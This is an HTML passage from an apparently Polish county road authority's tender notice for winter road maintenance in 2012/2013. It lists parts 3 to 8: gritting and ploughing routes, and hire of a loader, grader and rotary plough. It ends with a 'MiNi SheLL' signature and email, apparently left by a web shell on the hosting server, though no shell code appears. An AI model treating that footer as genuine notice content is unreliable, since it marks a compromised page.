<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nośnikami przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego pod nadzorem własnym Powiatowego Zarządu Dróg w sezonie zimowym 2012/2013.
W gestii Wykonawcy jest zapewnienie sprawnej jednostki transportowej wraz z kierowcą dla potrzeb zimowego utrzymania dróg.
Wykonawca wykonuje usługi sprzętem (piaskarki, pługi, czołownice) powierzonym przez Powiatowy Zarząd Dróg w grupie dróg X3 (odc. dróg. Siekierczyna - Raszówki - Naszacowice, Długołęka - Przyszowa, oraz Mokra Wieś - Stronie).
Świadczenie usług jednostkami transportowymi polega w szczególności na:
1.	przygotowaniu powierzonego sprzętu do pełnej sprawności technicznej,
2.	zwalczaniu gołoledzi (śliskości) materiałami uszorstniającymi i mieszankami chemicznymi i niechemicznymi, przy użyciu materiałów i piaskarki PZD w Limanowej,
3.	odśnieżaniu dróg przy użyciu pługu PZD w Limanowej,
4.	pełnieniu dyżurów sprzętu w wymiarze określonym przez Zamawiającego
5.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych powierzonego sprzętu,
6.	po zakończeniu akcji zimowej, wykonaniu naprawy i konserwacji powierzonego sprzętu, oraz wymianie zużytych części eksploatacyjnych na nowe i zwrocie całego wyposażenia - osprzętu do 15.05.2013r.
7.	wykonaniu koniecznych napraw przy użyciu części dostarczonych przez PZD w przypadku uszkodzenia powierzonego sprzętu nie z winy Wykonawcy.
Zakres zamówienia obejmuje zimowe utrzymanie 17,022 km dróg powiatowych.
Materiały niezbędne do zwalczania śliskości zapewni Zamawiający. 
Mechaniczny załadunek piaskarek materiałami uszorstniającymi i mieszankami chemicznymi zapewni Zamawiający. 
Szczegółowy zakres przedmiotu zamówienia określa Szczegółowa Specyfikacja Techniczna - SST oraz wykaz dróg wraz z kilometrażem będące załącznikami do niniejszej specyfikacji.
Umowny sezon zimowego utrzymania dróg trwa od 01.11.2012 do 31.03.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD, przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 w grupie dróg X4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nośnikami przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego pod nadzorem własnym Powiatowego Zarządu Dróg w sezonie zimowym 2012/2013.
W gestii Wykonawcy jest zapewnienie sprawnej jednostki transportowej wraz z kierowcą dla potrzeb zimowego utrzymania dróg.
Wykonawca wykonuje usługi sprzętem (piaskarki, pługi, czołownice) powierzonym przez Powiatowy Zarząd Dróg w grupie dróg X4 (odc. dróg. Łukowica - Jastrzębie, Jastrzębie - Jadamwola, oraz Świdnik - Łukowica).
Świadczenie usług jednostkami transportowymi polega w szczególności na:
1.	przygotowaniu powierzonego sprzętu do pełnej sprawności technicznej,
2.	zwalczaniu gołoledzi (śliskości) materiałami uszorstniającymi i mieszankami chemicznymi i niechemicznymi, przy użyciu materiałów i piaskarki PZD w Limanowej,
3.	odśnieżaniu dróg przy użyciu pługu PZD w Limanowej,
4.	pełnieniu dyżurów sprzętu w wymiarze określonym przez Zamawiającego
5.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych powierzonego sprzętu,
6.	po zakończeniu akcji zimowej, wykonaniu naprawy i konserwacji powierzonego sprzętu, oraz wymianie zużytych części eksploatacyjnych na nowe i zwrocie całego wyposażenia - osprzętu do 15.05.2013r.
7.	wykonaniu koniecznych napraw przy użyciu części dostarczonych przez PZD w przypadku uszkodzenia powierzonego sprzętu nie z winy Wykonawcy.
Zakres zamówienia obejmuje zimowe utrzymanie 17,634 km dróg powiatowych.
Materiały niezbędne do zwalczania śliskości zapewni Zamawiający. 
Mechaniczny załadunek piaskarek materiałami uszorstniającymi i mieszankami chemicznymi zapewni Zamawiający. 
Szczegółowy zakres przedmiotu zamówienia określa Szczegółowa Specyfikacja Techniczna - SST oraz wykaz dróg wraz z kilometrażem będące załącznikami do niniejszej specyfikacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi - osprzęt powierzony przez PZD, przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 w grupie dróg X5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług nośnikami przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego pod nadzorem własnym Powiatowego Zarządu Dróg w sezonie zimowym 2012/2013.
W gestii Wykonawcy jest zapewnienie sprawnej jednostki transportowej wraz z kierowcą dla potrzeb zimowego utrzymania dróg.
wykonawca wykonuje usługi sprzętem (piaskarki, pługi, czołownice) powierzonym przez Powiatowy Zarząd Dróg w grupie dróg X5 (odc. dróg. Limanowa - Zalesie, Zalesie - Kamienica, ul. Zygmunta Augusta).
Świadczenie usług jednostkami transportowymi polega w szczególności na:
1.	przygotowaniu powierzonego sprzętu do pełnej sprawności technicznej,
2.	zwalczaniu gołoledzi (śliskości) materiałami uszorstniającymi i mieszankami chemicznymi i niechemicznymi, przy użyciu materiałów i piaskarki PZD w Limanowej,
3.	odśnieżaniu dróg przy użyciu pługu PZD w Limanowej,
4.	pełnieniu dyżurów sprzętu w wymiarze określonym przez Zamawiającego
5.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych powierzonego sprzętu,
6.	po zakończeniu akcji zimowej, wykonaniu naprawy i konserwacji powierzonego sprzętu, oraz wymianie zużytych części eksploatacyjnych na nowe i zwrocie całego wyposażenia - osprzętu do 15.05.2013r.
7.	wykonaniu koniecznych napraw przy użyciu części dostarczonych przez PZD w przypadku uszkodzenia powierzonego sprzętu nie z winy Wykonawcy.
Zakres zamówienia obejmuje zimowe utrzymanie 9,802 km dróg powiatowych.
Kierowca winien posiadać aktualne szkolenie w zakresie obsługi posypywarki STRATOS B-50 DCXN.
Materiały niezbędne do zwalczania śliskości zapewni Zamawiający. 
Mechaniczny załadunek piaskarek materiałami uszorstniającymi i mieszankami chemicznymi zapewni Zamawiający. 
Szczegółowy zakres przedmiotu zamówienia określa Szczegółowa Specyfikacja Techniczna - SST oraz wykaz dróg wraz z kilometrażem będące załącznikami do niniejszej specyfikacji.
Umowny sezon zimowego utrzymania dróg trwa od 01.11.2012 do 31.03.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 60.18.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 - wynajem koparko - ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług własną koparko - ładowarką przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 pod nadzorem własnym Powiatowego Zarządu Dróg. 
W gestii Wykonawcy jest zapewnienie sprawnego sprzętu wraz z operatorem.
Świadczenie usług koparko - ładowarką polega w szczególności na:
1.	załadunku piaskarek materiałami uszorstniającymi i mieszankami chemicznymi i niechemicznymi oraz przygotowanie tych mieszanek ((materiały PZD)
2.	hałdowanie materiałów uszorstniajacych
3.	przewozie soli pod wiatę
4.	pełnieniu dyżurów sprzętu w wymiarze ryczałtowym,
5.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych ładowarki
6.	pozimowe sprzątanie jezdni.
Materiały niezbędne do załadunku zapewnia Zamawiający 
Gabaryt koparko - ładowarki winien umożliwiać pracę w wiacie na sól o wymiarach 2,60 x 4,10 m
Umowny sezon zimowego utrzymania dróg trwa od 01.11.2012 - 31.03.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.20.00-7, 63.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 - wynajem równiarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług własną równiarką przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 pod nadzorem własnym Powiatowego Zarządu Dróg. 
W gestii Wykonawcy jest zapewnienie sprawnego sprzętu wraz z operatorem.
Świadczenie usług równiarką polega w szczególności na:
1.	zwalczeniu naboju lodowego, poszerzeniu jezdni, pracach porządkowych związanych z ZUD,
2.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych równiarki.
Umowny sezon zimowego utrzymania dróg trwa od 01.11.2012 - 31.03.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.20.00-7, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Świadczenie usług jednostkami transportowymi przy zimowym utrzymaniu dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 - wynajem pługa wirnikowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem realizacji zamówienia jest świadczenie usług własnym pługiem wirnikowym przy prowadzeniu akcji zimowego utrzymania dróg powiatowych na terenie Powiatu Limanowskiego w sezonie zimowym 2012/2013 pod nadzorem własnym Powiatowego Zarządu Dróg. 
W gestii Wykonawcy jest zapewnienie sprawnego sprzętu wraz z operatorem.
Świadczenie usług pługiem wirnikowym polega w szczególności na:
1.	zwalczeniu naboju lodowego, poszerzeniu jezdni, pracach porzadkowych związanych z ZUD,
2.	zapewnieniu we własnym zakresie stałej obsługi naprawczo - remontowej materiałów eksploatacyjnych pługu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.18.20.00-7, 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com